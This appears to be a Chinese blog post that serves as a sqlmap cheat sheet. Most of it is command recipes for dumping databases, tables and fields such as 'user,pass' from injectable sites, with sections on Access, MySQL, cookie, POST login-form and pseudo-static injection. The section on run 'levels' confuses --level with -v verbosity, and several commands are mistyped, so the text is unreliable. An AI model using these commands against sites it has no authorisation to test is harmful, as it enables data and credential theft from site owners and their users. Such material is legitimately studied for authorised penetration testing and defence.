對各種注入的一些基本步驟

1.sqlmap支持的注入模式

sqlmap支持五種不同的注入模式:

1、基於布爾的盲注: 即可以根據返回頁面判斷條件真假的注入。

2、基於時間的盲注: 即不能根據頁面返回內容判斷任何信息,用條件語句查看時間延遲語句是否執行(即頁面返回時間是否增加)來判斷。

3、基於報錯注入:  即頁面會返回錯誤信息,或者把注入的語句的結果直接返回在頁面中。

4、聯合查詢注入: 可以使用union的情況下的注入。

5、堆查詢注入: 可以同時執行多條語句的執行時的注入。

2.sqlmap支持注入的數據庫

MySQL, Oracle, PostgreSQL, Microsoft SQL Server, Microsoft Access, IBM DB2, SQLite, Firebird, Sybase和SAP MaxDB

3.注入的一個流程

給sqlmap一個url的時候,它會:

1、判斷可注入的參數
2、判斷可以用那種SQL注入技術來注入
3、識別出哪種數據庫
4、根據用戶選擇,讀取哪些數據

url可以提供一個簡單的URL,Burp或WebScarab請求日誌文件,文本文檔中的完整http請求或者Google的搜索,匹配出結果頁面,也可以自己定義一個正則來判斷那個地址去測試。測試GET參數,POST參數,HTTP Cookie參數,HTTP User-Agent頭和HTTP Referer頭來確認是否有SQL注入,它也可以指定用逗號分隔的列表的具體參數來測試。
還可以設定HTTP(S)請求的併發數,來提高盲注時的效率。

4.sqlmap運行的級別–level
sqlmap中共有七個等級,默認等級爲1
0、只顯示Python錯誤以及嚴重的信息。
1、同時顯示基本信息和警告信息。(默認)
2、同時顯示debug信息。
3、同時顯示注入的payload。
4、同時顯示HTTP請求。
5、同時顯示HTTP響應頭。
6、同時顯示HTTP響應頁面。

等級是指測試結果的輸出的詳細程度,根據測試,–level等級的提高得到的效果遠比-v等級提高得到的效果好,如果你想看到sqlmap發送的測試payload最好的等級就是3。

5.對各種注入的一些基本步驟

1.sqlmap注入拖庫常用命令

  1. sqlmap.py -u “注入地址” -v 1 –dbs   // 列舉數據庫   
  2.   
  3. sqlmap.py -u “注入地址” -v 1 –current-db   // 當前數據庫  
  4.   
  5. sqlmap.py -u “注入地址” -v 1 –users    // 列數據庫用戶  
  6.   
  7. sqlmap.py -u “注入地址” -v 1 –current-user  // 當前用戶  
  8.   
  9. sqlmap.py -u “注入地址” -v 1 –tables -D “數據庫”   // 列舉數據庫的表名  
  10.   
  11. sqlmap.py -u “注入地址” -v 1 –columns -T “表名” -D “數據庫”   // 獲取表的列名  
  12.   
  13. sqlmap.py -u “注入地址” -v 1 –dump -C “字段,字段” -T “表名” -D “數據庫”   // 獲取表中的數據,包含列   

2.access注入

  1. 1.輸入url  
  2. 2.url –tables 猜表  
  3. 3 url–columns -T 表名     暴字段  
  4. 4.url –dump(脫褲) -T 表名 -C ”字段名”  暴內容  

3.mysql注入

  1. url –current-db當前庫  
  2. url –current-user當前用戶  
  3. url –dbs     獲得數據庫  
  4. url -D 數據庫 –tables 獲得表  
  5. url -D 數據庫 -T 表名 –columns 暴字段  
  6. url -D 數據庫 -T 表名 -C 字段 –dump   暴內容  

4.cookie注入

  1. url –cookie ”id=” –table –level 2    暴表  
  2. url –cookie ”id=” –columns -T 表名 –level 2 獲得字段  
  3. url –cookie ”id=“ –dump -T 表名 -C ”字段名” –level 2  獲得內容  

5.POST登陸框注入

注入點:

http://xxx.xxx.com/Login.asp


注入方式一:

     1.對着注入點使用burp抓包,保存txt格式文件。
     2.輸入命令:sqlmap.py -r search-test.txt -p tfUPass


注入方式二:自動搜索表單的方式    

  1. sqlmap -u http://www.xxx.com/Login.asp –forms  


注入方式三:指定一個參數的方法 

  1. sqlmap -u http://www.xxx.com/Login.asp –data ”tfUName=1&tfUPass=1“  

6.cookie注入

單個注入

  1. sqlmap -u “http://www.xxx.com/index.php” –cookie “id=1″  –dbs –level 2  
  2. sqlmap -u “http://www.xxx.com/index.php” –cookie “id=” –clumns -T 表段 –level 2  
  3. sqlmap -u “http://www.xxx.com/index.php” –cookie “id=” –dump -T 表段 -C “user,pass” –level 2  

7.僞靜態注入

目標站點:http://www.xxxx.com/id/3-1.html

  1. sqlmap -u www.xxxx.com/id/3*.html –dbs  

8.請求延時注入

  1. sqlmap –dbs -u usr –delay 1(時間,可隨意)  
  2. sqlmap –dbs -u usr –safe-freq 1(次數,可隨意)  
發表評論
所有評論
還沒有人評論,想成為第一個評論的人麼? 請在上方評論欄輸入並且點擊發布.
相關文章